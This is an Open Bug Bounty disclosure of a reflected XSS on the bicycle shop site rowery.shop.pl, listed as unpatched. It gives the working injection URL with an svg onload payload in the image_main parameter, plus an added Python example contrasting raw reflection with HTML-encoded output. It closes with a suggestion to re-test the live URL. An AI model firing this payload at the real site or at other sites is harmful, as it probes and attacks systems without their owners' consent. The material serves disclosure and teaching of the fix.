rowery.shop.pl XSS vulnerability

2017-09-08T12:36:00
ID OBB:291170
Type openbugbounty
Reporter M0r3h4x
Modified 2017-12-07T13:38:00

Description

Vulnerable URL (the `&image_main=` and `&product_*` parameter separators were mangled into HTML entities in the original listing and are restored here):
http://rowery.shop.pl/catalog/view/theme/_ajax_view-product.php?product_href=http://rowery.shop.pl/index.php?route=product/product&product_id=502&view_details=Szczeg%C3%B3%C5%82y&image_main=xss%22%3E%3Csvg/onload=prompt(/openbugbounty/)%3E&image_popup=http://rowery.shop.pl/image/cache/products/502/muz269ia-1200x1600.png&product_name=EVADO%204.0&product_price=2.099%20z%C5%82&product_special=1.789%20z%C5%82&product_rating=0&array_images=s:8:%22s:1:%220%22;%22;&product_description_short=SPECYFIKACJA --%20por%C3%B3wnaj%20-- Evado%207.0Trans%20SolarTrans%20GlobalEvado%206.0Trans%20AfricaTrans%20ArcticaEvado%205.0Trans%20SanderTrans%20AlpTrans%20PacificEvado%203.0Evado%202.0Trans%20SiberianTrans%20AtlanticEvado%201.0Trans%20IndiaRamaAluminium%20LiteWidelecSR%20Suntour%20NEX%20HLO%20(skok%2063mm)Tylny%20amortyzator-Ilo%C5%9B%C4%87%20bieg%C3%B3w24Przerzutka%20prz%C3%B3dShimano%20Altus%20FD-M191Przerzutka%20ty%C5%82Shimano%20Alivio%20RD-T4000Hamulec%20prz%C3%B3dTektro%20Disc%20HDC-300%20(hydrauliczny,%20tarcza%20160mm)Hamulec%20ty%C5%82Tektro%20Disc%20HDC-300%20(hydrauliczny,%20tarcza%20160mm)D%C5%BAwignie%20hamulcaTektro%20Disc%20HDC-300%20(hydrauliczne)ManetkiShimano%20Altus%20SL-M310%203x8-bieg%C3%B3wKorbyShimano%20Tourney%20FC-M171%2048/38/28T%C5%81a%C5%84cuchYBN%20S8Kaseta%20/%20WolnobiegShimano%20Acera%20CS-HG41-8%2011-32TPiasta%20prz%C3%B3dJoy%20Tech%20D041DSEPiasta%20ty%C5%82Joy%20Tech%20D142DSEOponySchwalbe%20CX%20Comp%20Kevlar%20Guard%2028%22x1,5%22Obr%C4%99czeKross%20(Aluminium,%20podw%C3%B3jna%20%C5%9Bcianka)KierownicaKross%20Active%20Components%20(Aluminium,%20niski%20wznios,%20620mm-S;%20640mm-M,L;%20660mm-Xl,%2031,8mm)Wspornik%20kierownicyKross%20Active%20Components%20(Aluminium,%20ahead,%2031,8mm)Wspornik%20siod%C5%82aKross%20Active%20Components%20(Aluminium,%2027,2mm)SteryFeimin%20H835BSiod%C5%82oSelle%20Royal%20ShadowChwytyHerrmans%20OxyPeda%C5%82yAluminium%20VP-519AWaga14.6Uwagi-...

The injected value is the `image_main` query parameter. URL-decoded it reads `xss"><svg/onload=prompt(/openbugbounty/)>`: the leading `">` closes a double-quoted attribute value and the tag that carries it, and the `<svg onload=...>` element that follows executes as soon as the browser parses the reflected response. The `prompt(/openbugbounty/)` call is the non-destructive proof-of-concept Open Bug Bounty researchers use in place of a real payload. The parameter name suggests the theme's AJAX product-view script reflects the value into an image element without HTML-encoding it; the listing does not include the script's source, so the exact reflection point is not confirmed here.
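The following is an added example, not code from the Open Bug Bounty report or from rowery.shop.pl. It recovers the payload from the reported URL, then models the assumed vulnerable pattern (the `image_main` value copied raw into an `<img src="...">` attribute) beside the fix (attribute-context HTML encoding, the equivalent of PHP's `htmlspecialchars($v, ENT_QUOTES, 'UTF-8')`), and uses the standard-library HTML parser to check whether the reflection produced a new element with an event-handler attribute. The template and the `_ajax_view-product.php` rendering logic are assumptions; only the URL and payload come from the listing.

```python
"""Reflected XSS in an attribute context: payload recovery, the assumed
vulnerable reflection, the encoded fix, and a parser-based check.

Added illustration; not the site's code. The <img src> template is an
assumption based on the parameter name `image_main`.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Reported URL, trimmed to the parameters that matter (same payload).
REPORTED_URL = (
    "http://rowery.shop.pl/catalog/view/theme/_ajax_view-product.php"
    "?product_href=http://rowery.shop.pl/index.php?route=product/product"
    "&product_id=502"
    "&image_main=xss%22%3E%3Csvg/onload=prompt(/openbugbounty/)%3E"
    "&image_popup=http://rowery.shop.pl/image/cache/products/502/muz269ia-1200x1600.png"
)


def extract_param(url: str, name: str) -> str:
    """Return the URL-decoded value of one query parameter."""
    return parse_qs(urlsplit(url).query)[name][0]


def render_vulnerable(image_main: str) -> str:
    """Assumed vulnerable pattern: raw reflection into a quoted attribute."""
    return f'<div class="product-image"><img src="{image_main}" alt="product"></div>'


def render_fixed(image_main: str) -> str:
    """Fix: encode &, <, >, " and ' before placing the value in an attribute.
    html.escape(quote=True) matches htmlspecialchars(..., ENT_QUOTES)."""
    safe = escape(image_main, quote=True)
    return f'<div class="product-image"><img src="{safe}" alt="product"></div>'


class EventHandlerFinder(HTMLParser):
    """Collect (tag, attribute, value) for every on* attribute the parser sees.

    If the reflected value created a new element with an event handler, the
    browser would run it; an encoded value stays inside the src attribute
    and yields nothing here.
    """

    def __init__(self) -> None:
        super().__init__()
        self.handlers: list[tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name, value or ""))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def injected_handlers(html_doc: str) -> list[tuple[str, str, str]]:
    """Parse a rendered fragment and return any event-handler attributes."""
    finder = EventHandlerFinder()
    finder.feed(html_doc)
    finder.close()
    return finder.handlers


if __name__ == "__main__":
    payload = extract_param(REPORTED_URL, "image_main")
    print("payload:", payload)
    print("vulnerable:", injected_handlers(render_vulnerable(payload)))
    print("fixed:     ", injected_handlers(render_fixed(payload)))
```

The same check can be applied to a live response: fetch the reported URL, feed the body to `injected_handlers`, and a non-empty list containing `("svg", "onload", "prompt(/openbugbounty/)")` confirms the reflection is still unencoded. The listing records the issue as unpatched at its last check on 07.12.2017.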
Details:

Field | Value
---|---
Patched: | No
Latest check for patch: | 07.12.2017
Vulnerability type: | XSS
Vulnerability status: | Publicly disclosed
Alexa Rank: | 4767148
VIP website status: | No

Coordinated Disclosure Timeline:

Event | Date
---|---
Vulnerability submitted via Open Bug Bounty | 8 September, 2017 12:36 GMT
Generic security notifications sent to website owner | 8 September, 2017 12:39 GMT
Vulnerability details disclosed by researcher | 7 December, 2017 13:38 GMT